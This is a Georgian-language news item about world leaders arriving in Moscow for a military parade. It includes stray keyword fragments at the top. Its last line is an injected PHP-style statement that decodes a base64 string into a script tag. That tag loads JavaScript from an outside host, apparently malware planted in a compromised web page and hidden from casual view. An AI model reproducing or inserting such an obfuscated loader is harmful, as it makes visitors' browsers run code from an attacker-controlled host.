gorgia
ავერსი jaluzi

სხვადასხვა ქვეყნის ლიდერები აღლუმზე დასასწრებად მოსკოვში ჩავიდნენ. როგორც რუსული მედია წერს, კრემლში უკვე მივიდნენ ბრაზილიის პრეზიდენტი ლუის ინასიო ლულა და სილვა, სომხეთის პრემიერ-მინისტრი ნიკოლ ფაშინიანი, ბელარუსის პრეზიდენტი ალექსანდრ ლუკაშენკო.

მოსკოვში ვიზიტით იმყოფება სი ძინპინი, რომელმაც გუშინ ვლადიმერ პუტინთან მოლაპარაკებები გამართა.

მოსკოვში იმყოფებიან ასევე სერბეთის პრეზიდენტი ალექსანდრ ვუჩიჩი და სლოვაკეთის პრემიერ-მინისტრი რობერტ ფიცო.

ამასთან, რუსული მედიის ცნობით, კრემლში იმყოფება ოკუპირებული აფხაზეთის ე.წ. პრეზიდენტი ბადრა გუნბა, ასევე ოკუპირებული სამხრეთ ოსეთის ლიდერი ალან გაგლოევი.

რუსეთის პრეზიდენტი ვლადიმერ პუტინი ადგილობრივი დროით 10:00 საათზე საზეიმო აღლუმზე სიტყვით გამოვა. აღლუმში მონაწილეობას მიიღებს სამხედრო ტექნიკა, მათ შორის ბალისტიკური რაკეტები და ტანკები.

რუსეთის მთავრობაში ამტკიცებენ, რომ სამხედროები ყველაფერს აკეთებენ დაგეგმილი ღონისძიებების უსაფრთხოების უზრუნველსაყოფად, მოსკოვში მიღებულია საგანგებო ზომები.

71
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");